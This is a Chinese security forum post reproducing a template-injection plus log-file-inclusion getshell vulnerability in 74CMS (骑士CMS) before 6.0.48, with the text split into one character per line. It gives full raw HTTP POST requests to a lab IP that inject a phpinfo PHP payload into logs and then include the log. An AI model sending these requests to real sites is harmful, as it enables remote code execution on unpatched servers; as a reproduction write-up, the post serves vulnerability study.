论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[7630] 2021-07-05_骑士CMS模版注入+文件包含getshell漏洞复现
文档创建者:
s7ckTeam
浏览次数:
7
最后更新:
2025-01-17
漏洞
7 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2021-07-05_骑士CMS模版注入+文件包含getshell漏洞复现
骑
士
C
M
S
模
版
注
入
+
文
件
包
含
g
e
t
s
h
e
l
l
漏
洞
复
现
F
1
2
s
e
c
2
0
2
1
-
0
7
-
0
5
以
下
文
章
来
源
于
天
禧
信
安
,
作
者
D
X
X
天
禧
信
安
一
、
骑
士
一
、
骑
士
C
M
S
简
介
简
介
骑
士
人
才
系
统
,
是
一
项
基
于
P
H
P
+
M
Y
S
Q
L
为
核
心
开
发
的
一
套
免
费
+
开
源
专
业
人
才
招
聘
系
统
,
使
用
了
T
h
i
n
k
P
H
P
框
架
(
3
.
2
.
3
)
;
由
太
原
迅
易
科
技
有
限
公
司
于
2
0
0
9
年
正
式
推
出
。
为
个
人
求
职
和
企
业
招
聘
提
供
信
息
化
解
决
方
案
,
骑
士
人
才
系
统
具
备
执
行
效
率
高
、
模
板
切
换
自
由
、
后
台
管
理
功
能
灵
活
、
模
块
功
能
强
大
等
特
点
,
自
上
线
以
来
一
直
是
职
场
人
士
、
企
业
H
R
青
睐
的
求
职
招
聘
平
台
。
经
过
7
年
的
发
展
,
骑
士
人
才
系
统
已
成
国
内
人
才
系
统
行
业
的
排
头
兵
。
系
统
应
用
涉
及
政
府
、
企
业
、
科
研
教
育
和
媒
体
等
行
业
领
域
,
用
户
已
覆
盖
国
内
所
有
省
份
和
地
区
。
2
0
1
6
年
全
新
推
出
骑
士
人
才
系
统
基
础
版
,
全
新
的
“
平
台
+
插
件
”
体
系
,
打
造
用
户
“
D
I
Y
”
个
性
化
功
能
定
制
,
为
众
多
地
方
门
户
、
行
业
人
才
提
供
一
个
专
业
、
稳
定
、
方
便
的
网
络
招
聘
管
理
平
台
,
致
力
发
展
成
为
引
领
市
场
风
向
的
优
质
高
效
的
招
聘
软
件
二
、
环
境
搭
建
二
、
环
境
搭
建
此
次
采
用
w
i
n
d
o
w
s
1
0
+
N
g
i
n
x
+
M
y
S
Q
L
+
P
H
P
,
使
用
p
h
p
s
t
u
d
y
进
行
的
环
境
配
置
,
注
意
P
H
P
版
本
最
好
使
用
P
H
P
5
.
5
及
以
上
,
M
y
S
Q
L
版
本
5
.
7
.
6
及
以
上
,
我
这
里
使
用
P
H
P
版
本
5
.
4
.
4
5
然
后
这
里
放
一
下
骑
士
c
m
s
的
下
载
链
接
:
h
t
t
p
s
:
/
/
p
a
n
.
h
a
l
l
o
l
c
k
.
c
o
m
/
s
/
y
0
6
I
6
三
、
安
装
过
程
三
、
安
装
过
程
天
禧
信
安
天
禧
信
安
.
寻
麓
信
息
旗
下
网
络
安
全
工
作
室
成
员
,
专
注
于
计
算
机
安
全
&
社
会
工
程
学
,
愿
各
位
在
此
能
有
所
收
获
四
、
漏
洞
概
述
四
、
漏
洞
概
述
官
方
公
告
地
址
/
A
p
p
l
i
c
a
t
i
o
n
/
C
o
m
m
o
n
/
C
o
n
t
r
o
l
l
e
r
/
B
a
s
e
C
o
n
t
r
o
l
l
e
r
.
c
l
a
s
s
.
p
h
p
文
件
的
a
s
s
i
g
n
_
r
e
s
u
m
e
_
t
p
l
函
数
因
为
过
滤
不
严
格
,
导
致
了
模
板
注
入
,
可
以
进
行
远
程
命
令
执
行
影
响
版
本
影
响
版
本
:
骑
士
骑
士
C
M
S
<
6
.
0
.
4
8
>
五
、
漏
洞
复
现
五
、
漏
洞
复
现
写
入
日
志
写
入
日
志
P
O
S
T
参
数
:
我
们
来
P
O
S
T
一
下
看
看
可
以
看
到
返
回
了
错
误
,
日
志
已
经
记
录
了
我
们
来
翻
一
下
日
志
h
t
t
p
:
/
/
w
w
w
.
7
4
c
m
s
.
c
o
m
/
n
e
w
s
/
s
h
o
w
-
2
4
9
7
.
h
t
m
l
h
t
t
p
:
/
/
y
o
u
r
-
i
p
/
i
n
d
e
x
.
p
h
p
?
m
=
h
o
m
e
&
a
=
a
s
s
i
g
n
_
r
e
s
u
m
e
_
t
p
l
P
O
S
T
:
v
a
r
i
a
b
l
e
=
1
&
t
p
l
=
<
?
p
h
p
p
h
p
i
n
f
o
(
)
;
o
b
_
f
l
u
s
h
(
)
;
?
>
/
r
/
n
<
q
s
c
m
s
/
c
o
m
p
a
n
y
_
s
h
o
w
列
表
名
=
"
i
n
f
o
"
企
业
i
d
=
"
$
_
G
E
T
[
'
i
d
'
]
"
/
>
P
O
S
T
/
7
4
c
m
s
v
6
.
0
.
2
0
/
u
p
l
o
a
d
/
i
n
d
e
x
.
p
h
p
?
m
=
h
o
m
e
&
a
=
a
s
s
i
g
n
_
r
e
s
u
m
e
_
t
p
l
H
T
T
P
/
1
.
1
H
o
s
t
:
1
9
2
.
1
6
8
.
1
.
6
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
9
8
C
a
c
h
e
-
C
o
n
t
r
o
l
:
m
a
x
-
a
g
e
=
0
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
C
o
n
t
e
n
t
-
T
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
x
-
w
w
w
-
f
o
r
m
-
u
r
l
e
n
c
o
d
e
d
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
W
i
n
d
o
w
s
N
T
1
0
.
0
;
W
i
n
6
4
;
x
6
4
;
r
v
:
8
9
.
0
)
G
e
c
k
o
/
2
0
1
0
0
1
0
1
F
i
r
e
f
o
x
/
8
9
.
0
A
c
c
e
p
t
:
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
;
q
=
0
.
9
,
i
m
a
g
e
/
w
e
b
p
,
*
/
*
;
q
=
0
.
8
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
z
h
-
C
N
,
z
h
;
q
=
0
.
8
,
z
h
-
T
W
;
q
=
0
.
7
,
z
h
-
H
K
;
q
=
0
.
5
,
e
n
-
U
S
;
q
=
0
.
3
,
e
n
;
q
=
0
.
2
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
R
e
f
e
r
e
r
:
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
6
/
7
4
c
m
s
v
6
.
0
.
2
0
/
u
p
l
o
a
d
/
i
n
d
e
x
.
p
h
p
?
m
=
h
o
m
e
&
a
=
a
s
s
i
g
n
_
r
e
s
u
m
e
_
t
p
l
D
N
T
:
1
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
C
o
o
k
i
e
:
P
H
P
S
E
S
S
I
D
=
v
j
1
2
p
9
l
3
p
n
q
k
c
0
9
o
s
t
u
m
5
m
7
m
f
u
;
t
h
i
n
k
_
l
a
n
g
u
a
g
e
=
z
h
-
C
N
;
t
h
i
n
k
_
t
e
m
p
l
a
t
e
=
d
e
f
a
u
l
t
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
C
a
c
h
e
-
C
o
n
t
r
o
l
:
m
a
x
-
a
g
e
=
0
v
a
r
i
a
b
l
e
=
1
&
t
p
l
=
<
?
p
h
p
p
h
p
i
n
f
o
(
)
;
o
b
_
f
l
u
s
h
(
)
;
?
>
/
r
/
n
<
q
s
c
m
s
/
c
o
m
p
a
n
y
_
s
h
o
w
h
=
"
i
n
f
o
"
i
d
=
"
$
_
G
E
T
[
'
i
d
'
]
"
/
>
日
志
路
径
:
u
p
l
o
a
d
d
a
t
a
R
u
n
t
i
m
e
L
o
g
s
H
o
m
e
成
功
写
入
接
下
来
我
们
尝
试
包
含
日
志
,
日
志
名
称
就
是
测
试
当
天
的
年
月
日
包
含
日
志
包
含
日
志
P
O
S
T
参
数
:
我
们
来
P
O
S
T
一
下
看
看
六
、
修
复
建
议
六
、
修
复
建
议
下
载
官
方
最
新
补
丁
包
h
t
t
p
:
/
/
y
o
u
r
-
i
p
/
i
n
d
e
x
.
p
h
p
?
m
=
h
o
m
e
&
a
=
a
s
s
i
g
n
_
r
e
s
u
m
e
_
t
p
l
P
O
S
T
:
v
a
r
i
a
b
l
e
=
1
&
t
p
l
=
d
a
t
a
/
R
u
n
t
i
m
e
/
L
o
g
s
/
H
o
m
e
/
2
0
_
1
2
_
2
2
.
l
o
g
P
O
S
T
/
7
4
c
m
s
v
6
.
0
.
2
0
/
u
p
l
o
a
d
/
i
n
d
e
x
.
p
h
p
?
m
=
h
o
m
e
&
a
=
a
s
s
i
g
n
_
r
e
s
u
m
e
_
t
p
l
H
T
T
P
/
1
.
1
H
o
s
t
:
1
9
2
.
1
6
8
.
1
.
6
C
o
n
t
e
n
t
-
L
e
n
g
t
h
:
5
2
C
a
c
h
e
-
C
o
n
t
r
o
l
:
m
a
x
-
a
g
e
=
0
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
C
o
n
t
e
n
t
-
T
y
p
e
:
a
p
p
l
i
c
a
t
i
o
n
/
x
-
w
w
w
-
f
o
r
m
-
u
r
l
e
n
c
o
d
e
d
U
s
e
r
-
A
g
e
n
t
:
M
o
z
i
l
l
a
/
5
.
0
(
W
i
n
d
o
w
s
N
T
1
0
.
0
;
W
i
n
6
4
;
x
6
4
;
r
v
:
8
9
.
0
)
G
e
c
k
o
/
2
0
1
0
0
1
0
1
F
i
r
e
f
o
x
/
8
9
.
0
A
c
c
e
p
t
:
t
e
x
t
/
h
t
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
h
t
m
l
+
x
m
l
,
a
p
p
l
i
c
a
t
i
o
n
/
x
m
l
;
q
=
0
.
9
,
i
m
a
g
e
/
w
e
b
p
,
*
/
*
;
q
=
0
.
8
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
:
z
h
-
C
N
,
z
h
;
q
=
0
.
8
,
z
h
-
T
W
;
q
=
0
.
7
,
z
h
-
H
K
;
q
=
0
.
5
,
e
n
-
U
S
;
q
=
0
.
3
,
e
n
;
q
=
0
.
2
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
:
g
z
i
p
,
d
e
f
l
a
t
e
R
e
f
e
r
e
r
:
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
6
/
7
4
c
m
s
v
6
.
0
.
2
0
/
u
p
l
o
a
d
/
i
n
d
e
x
.
p
h
p
?
m
=
h
o
m
e
&
a
=
a
s
s
i
g
n
_
r
e
s
u
m
e
_
t
p
l
D
N
T
:
1
C
o
n
n
e
c
t
i
o
n
:
c
l
o
s
e
C
o
o
k
i
e
:
P
H
P
S
E
S
S
I
D
=
v
j
1
2
p
9
l
3
p
n
q
k
c
0
9
o
s
t
u
m
5
m
7
m
f
u
;
t
h
i
n
k
_
l
a
n
g
u
a
g
e
=
z
h
-
C
N
;
t
h
i
n
k
_
t
e
m
p
l
a
t
e
=
d
e
f
a
u
l
t
U
p
g
r
a
d
e
-
I
n
s
e
c
u
r
e
-
R
e
q
u
e
s
t
s
:
1
C
a
c
h
e
-
C
o
n
t
r
o
l
:
m
a
x
-
a
g
e
=
0
v
a
r
i
a
b
l
e
=
1
&
t
p
l
=
.
/
d
a
t
a
/
R
u
n
t
i
m
e
/
L
o
g
s
/
H
o
m
e
/
2
1
_
0
7
_
0
1
.
l
o
g
h
t
t
p
:
/
/
w
w
w
.
7
4
c
m
s
.
c
o
m
/
d
o
w
n
l
o
a
d
/
i
n
d
e
x
.
h
t
m
l
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞